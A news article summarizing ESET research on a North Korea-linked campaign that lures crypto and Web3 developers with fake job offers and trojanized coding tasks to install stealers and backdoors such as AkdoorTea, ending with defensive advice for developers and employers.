North Korean Hackers Target Crypto & Web3 Developers with AkdoorTea
Overview
Slovak cybersecurity firm ESET has published research showing an escalation in operations by North Korea-linked threat actors who target cryptocurrency and Web3 developers. Tracked as Deceptive Development, the activity overlaps with campaigns known as Contagious Interview, DEV#POPPER and Void Dokkaebi. The attackers focus on developers across Windows, Linux, and macOS, using social engineering on job platforms to trick victims into installing malware.
How the campaign operates
Attackers impersonate recruiters on job sites such as LinkedIn, Upwork, Freelancer and Crypto Jobs List. Typical steps include:
- Initial contact: Fake recruiter outreach offering lucrative developer roles.
- Challenges and assessments: Targets are asked to clone projects or complete video-based interview tasks that execute malicious code.
- Trojanized deliverables: GitHub repositories or downloadable “assignments” contain obfuscated scripts and installers that drop malware.
The attackers also use a “ClickFix” technique during fake video interviews: victims see simulated camera or mic errors and are instructed to run terminal commands, which trigger payload execution.
Tooling and malware families
ESET’s analysis shows a multi-platform toolkit combining custom and re-used malware. Notable components include:
- BeaverTail, InvisibleFerret, WeaselStore — information stealers that target crypto wallets, browser logins and keychains.
- TsunamiKit — multi-stage toolkit for persistence, .NET spyware deployment and cryptominer installation (XMRig, NBMiner).
- Tropidoor & PostNapTea — remote access trojans (RATs) associated with Lazarus-style operations featuring screen capture and file exfiltration.
- AkdoorTea — the latest backdoor hidden in a file masquerading as an NVIDIA driver update; often launched through BeaverTail.
Hybrid threat model: fraud and malware
ESET links DeceptiveDevelopment to North Korea’s broader WageMole scheme. In WageMole, covert workers use stolen or AI-generated identities to obtain remote jobs. Attackers may even use face-swapping during live interviews to appear authentic. Stolen data from malware campaigns is recycled to craft more convincing fake identities and job offers, creating a feedback loop between malware-driven theft and fraudulent hiring.
Why developers and employers should care
Key risks: Developers risk losing sensitive keys and credentials, while companies risk onboarding compromised workers who might act as insider threats. The campaign blurs state-sponsored espionage and organized cybercrime, increasing the urgency for stronger hiring and security checks.
ESET emphasizes that the operation relies more on creative social engineering and scale than on novel technical tricks. The actors reuse open-source tools, rent malware, and adapt dark-web projects to run large volumes of recruitment lures.
Practical defenses
- Verify recruiter identities: confirm roles and contacts through independent channels before accepting tasks or downloads.
- Avoid running untrusted code: don’t execute terminal commands or install packages from unknown sources.
- Use hardware wallets and strong key management: limit exposure of private keys on developer machines.
- Harden hiring processes: require live verification, multi-factor validation, and robust background checks.
- Deploy endpoint detection and regular scans to detect information stealers and RATs.
Read More : TorrentGalaxy Proxy List 2025 – Proxy/Mirror/Alternatives
Conclusion
The DeceptiveDevelopment campaign highlights a growing trend: attackers combine low-effort, high-scale social engineering with readily available malware to target high-value victims in the crypto and Web3 ecosystem. Developers and hiring organizations must tighten verification and adopt layered security controls to reduce both technical and human-centred risks.
